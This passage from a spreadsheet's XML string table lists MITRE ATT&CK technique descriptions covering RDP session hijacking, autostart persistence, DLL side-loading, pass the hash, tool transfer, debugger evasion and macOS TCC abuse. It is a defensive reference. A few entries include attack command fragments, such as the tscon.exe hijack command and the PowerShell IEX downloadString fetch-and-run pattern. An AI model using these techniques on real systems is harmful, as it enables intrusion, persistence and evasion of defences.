The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions.
https://attack.mitre.org/techniques/T1543/002</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
Adversaries may perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, `c:\windows\system32\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)
https://attack.mitre.org/techniques/T1563/002</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>Adversaries may create an account to maintain access to victim systems.(Citation: Symantec WastedLocker June 2020) With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.
https://attack.mitre.org/techniques/T1136</t>
  </si>
  <si>
    <t>T1547.013</t>
  </si>
  <si>
    <t>XDG Autostart Entries</t>
  </si>
  <si>
    <t>Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)
Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.
Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)
https://attack.mitre.org/techniques/T1547/013</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
https://attack.mitre.org/techniques/T1584/004</t>
  </si>
  <si>
    <t>T1526</t>
  </si>
  <si>
    <t>Cloud Service Discovery</t>
  </si>
  <si>
    <t>An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.
Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)
For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)
Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).
https://attack.mitre.org/techniques/T1526</t>
  </si>
  <si>
    <t>T1018</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as  [Ping](https://attack.mitre.org/software/S0097) or &lt;code&gt;net view&lt;/code&gt; using [Net](https://attack.mitre.org/software/S0039).
Adversaries may also analyze data from local host files (ex: &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; or &lt;code&gt;/etc/hosts&lt;/code&gt;) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.
Adversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network (e.g. &lt;code&gt;show cdp neighbors&lt;/code&gt;, &lt;code&gt;show arp&lt;/code&gt;).(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021)
https://attack.mitre.org/techniques/T1018</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as &lt;code&gt;dns-sd -B _ssh._tcp .&lt;/code&gt;) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
https://attack.mitre.org/techniques/T1046</t>
  </si>
  <si>
    <t>T1590.001</t>
  </si>
  <si>
    <t>Domain Properties</t>
  </si>
  <si>
    <t>Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.
Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
https://attack.mitre.org/techniques/T1590/001</t>
  </si>
  <si>
    <t>T1518</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
https://attack.mitre.org/techniques/T1518</t>
  </si>
  <si>
    <t>T1538</t>
  </si>
  <si>
    <t>Cloud Service Dashboard</t>
  </si>
  <si>
    <t>An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.(Citation: Google Command Center Dashboard)
Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.
https://attack.mitre.org/techniques/T1538</t>
  </si>
  <si>
    <t>T1055.005</t>
  </si>
  <si>
    <t>Thread Local Storage</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process. 
TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/005</t>
  </si>
  <si>
    <t>T1622</t>
  </si>
  <si>
    <t>Debugger Evasion</t>
  </si>
  <si>
    <t>Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;IsDebuggerPresent()&lt;/code&gt; and &lt;code&gt; NtQueryInformationProcess()&lt;/code&gt;, or manually checking the &lt;code&gt;BeingDebugged&lt;/code&gt; flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as &lt;code&gt;OutputDebugStringW()&lt;/code&gt;.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)
https://attack.mitre.org/techniques/T1622</t>
  </si>
  <si>
    <t>T1036.006</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called &lt;code&gt;evil.bin&lt;/code&gt;, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to &lt;code&gt;evil.txt&lt;/code&gt;, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to &lt;code&gt;evil.txt &lt;/code&gt; (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
https://attack.mitre.org/techniques/T1036/006</t>
  </si>
  <si>
    <t>T1547.007</t>
  </si>
  <si>
    <t>Re-opened Applications</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; within the &lt;code&gt;~/Library/Preferences/ByHost&lt;/code&gt; directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; file to execute payloads when a user logs in.
https://attack.mitre.org/techniques/T1547/007</t>
  </si>
  <si>
    <t>T1608.006</t>
  </si>
  <si>
    <t>SEO Poisoning</t>
  </si>
  <si>
    <t>Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
https://attack.mitre.org/techniques/T1608/006</t>
  </si>
  <si>
    <t>T1550.002</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.
When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://attack.mitre.org/tactics/TA0006) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.
Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.(Citation: Stealthbits Overpass-the-Hash)
https://attack.mitre.org/techniques/T1550/002</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.
https://attack.mitre.org/techniques/T1052</t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Side-loading takes advantage of the DLL search order used by the loader by positioning both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.(Citation: FireEye DLL Side-Loading)
https://attack.mitre.org/techniques/T1574/002</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>Ingress Tool Transfer</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as &lt;code&gt;IEX(New-Object Net.WebClient).downloadString()&lt;/code&gt; and &lt;code&gt;Invoke-WebRequest&lt;/code&gt;. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)
Adversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)
https://attack.mitre.org/techniques/T1105</t>
  </si>
  <si>
    <t>T1216.002</t>
  </si>
  <si>
    <t>SyncAppvPublishingServer</t>
  </si>
  <si>
    <t>Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)
The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)
Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)
For example,  [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)
`SyncAppvPublishingServer.vbs "n; {PowerShell}"`
https://attack.mitre.org/techniques/T1216/002</t>
  </si>
  <si>
    <t>T1098.002</t>
  </si>
  <si>
    <t>Additional Email Delegate Permissions</t>
  </si>
  <si>
    <t>Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. 
For example, the &lt;code&gt;Add-MailboxPermission&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe) 
Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)
This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)
https://attack.mitre.org/techniques/T1098/002</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.
https://attack.mitre.org/techniques/T1588/003</t>
  </si>
  <si>
    <t>T1648</t>
  </si>
  <si>
    <t>Serverless Execution</t>
  </si>
  <si>
    <t>Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. 
Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation)
Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) This is also possible in many cloud-based office application suites. For example, in Microsoft 365 environments, an adversary may create a Power Automate workflow that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) In Google Workspace environments, they may instead create an Apps Script that exfiltrates a user's data when they open a file.(Citation: Cloud Hack Tricks GWS Apps Script)(Citation: OWN-CERT Google App Script 2024)
https://attack.mitre.org/techniques/T1648</t>
  </si>
  <si>
    <t>T1548.006</t>
  </si>
  <si>
    <t>TCC Manipulation</t>
  </si>
  <si>
    <t>Adversaries can manipulate or abuse the Transparency, Consent, &amp; Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy &amp; Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
https://attack.mitre.org/techniques/T1548/006</t>
  </si>
  <si>
    <t>T1055.008</t>
  </si>
  <si>
    <t>Ptrace System Calls</t>
  </si>
  <si>
    <t>Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 
Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: &lt;code&gt;malloc&lt;/code&gt;) then invoking that memory with &lt;code&gt;PTRACE_SETREGS&lt;/code&gt; to set the register containing the next instruction to execute. Ptrace system call injection can also be done with &lt;code&gt;PTRACE_POKETEXT&lt;/code&gt;/&lt;code&gt;PTRACE_POKEDATA&lt;/code&gt;, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018) 
Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject) 
Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.
https://attack.mitre.org/techniques/T1055/008</t>
  </si>
  <si>
    <t>T1653</t>
  </si>
  <si>
    <t>Power Settings</t>
  </si>
  <si>
    <t>Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)
Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)
For example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)
Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)
https://attack.mitre.org/techniques/T1653</t>
  </si>
  <si>
    <t>T1027.007</t>
  </si>
  <si>
    <t>Dynamic API Resolution</t>
  </si>
  <si>
    <t>Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.
API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing)
To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime.
Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash)
https://attack.mitre.org/techniques/T1027/007</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
